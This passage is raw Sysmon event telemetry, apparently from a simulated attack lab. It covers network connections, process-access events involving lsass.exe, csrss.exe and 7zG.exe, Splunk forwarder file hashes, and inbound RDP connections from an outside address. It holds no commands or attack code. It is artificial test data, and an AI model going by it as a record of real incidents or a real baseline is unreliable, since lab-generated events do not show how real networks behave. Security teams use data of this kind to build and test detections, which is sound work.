AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50896- 354300x8000000000000000295088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:02.490{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55847- 10341000x8000000000000000295087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.984{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14DF-6216-B206-000000003802}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:05.900{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:05.900{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:05.784{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C695193A7B81ADB3A9F629BA40E6F7C0,SHA256=1FAA44A1A0BC77DBD5D2B1BB58F1B42914809C2A88BE35A27C45798600614CDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:03.514{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51509-false10.0.1.12-8000- 354300x8000000000000000219274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:02.618{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx49385-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:05.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=161AD0E6EA60BF3535321F5D61300D4F,SHA256=A089CBBCF9F652DBB7B8C0E3D5208F3EFE56D81A260DAA2F164C5C0DF8EAF3C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:05.034{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C97C32F7E11B76F4CDEBAC2F593C956,SHA256=5033E0DBD76969C57F27A4F873AD31FB2794FE6DD48A23B2E006EA3A8717E62C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.322{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49202-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:03.322{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49202-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000295097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:06.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1279172F492D6D666DEA5066F0902C3,SHA256=1EA0222EE4E758729D427120E02706B60360BB3D761630BC2530D299C1202606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:06.050{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E37D6E1790CCC69D1F49BFEF841682,SHA256=ED54E048A7E71097D9DDE624D6AAEB5DF2591A9E0F7B16B76926E71CE174D25B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:04.573{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49203-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:07.837{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B3EB1E3BF11F028F26D429B5CEB9B0,SHA256=6B3C6B0A85979983F563AFAEAFC7C1B13DE151DC434C12C7D2425D0A6C4CBF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:07.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31D735E4D1EC1FB6386BE05D9C2311A,SHA256=C97BA878C41FEA1907A6B9A2E75B23A910E67262E05611F8F4C43BCFD1934DA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:08.852{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7063831A10130CECC92DC845BEB2C39F,SHA256=F1FAB63F22710A88522AEC12A36476854B250ED03BFC9C8F87F7837A8B695665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:08.643{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA2E50F198845B508573CA66E067439A,SHA256=BB0B46CC2874A8852B021D27B0226D75FDC7E543C3721FF48B341435B7ADB239,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:05.859{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59364-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:08.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDF5BB18203A771F026FD51368E15F6,SHA256=AA124C1F5D25A58721B8430D2B33C5F1B80F2288D196DEAFFF23B7C3A4E09E03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:09.901{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C45D9F4D7E0FBC8101AD17B1263C065,SHA256=D09D470B238043976D6BC165C47311682350CD319DF73A31196F479D43F17E33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:09.070{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:09.070{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:09.096{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827FE562FF24126FADC4C5385FA02173,SHA256=5B0D754C723F6B8E87734EEBA3A540132775F9A6DF20AF6DDDB8EC9D608AD63F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:10.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F753AC6E929EBAA24FE414F33E2C10D,SHA256=6FAB3B11A76790860E970D32F53D654960765080F78D6B8DE62DDEF1A8505917,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:08.549{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51510-false10.0.1.12-8000- 23542300x8000000000000000219282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:10.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF2EB2AA1FC5F39493CE40C92C1D481,SHA256=93F01A7122FEF07CB44CB7D63601D2A9F038A130EBB6CF73F7502CC526206C57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:11.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E26C42D20F1DBD49D28FCA145A1D9AA,SHA256=7327DAB90E224D24BAC7CF27A69047C4EB3DB02F15E90584FF142DF60607F764,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:08.806{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59455-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:11.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DDD83A090B57AED0BA43B0C93567D95,SHA256=9955298658A60F449A8334FBC872EFB434BA767ABB7852C8806D0FD9DF92E05F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:09.674{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49204-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.938{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D09DB4C4E0613E17B18E849324714465,SHA256=D5173189CD271CBB965B4F3151DC339FEBC6E846457C06CA2C1F6157C582E14B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:12.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50FA522E2DD71958D72126C1772A0E55,SHA256=5C667FB0ED1561E5835A085C512FB96451AF0847FA7815DDDF1D2668F33E901C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.606{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.606{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.591{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.591{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.366{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.366{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.366{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.366{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 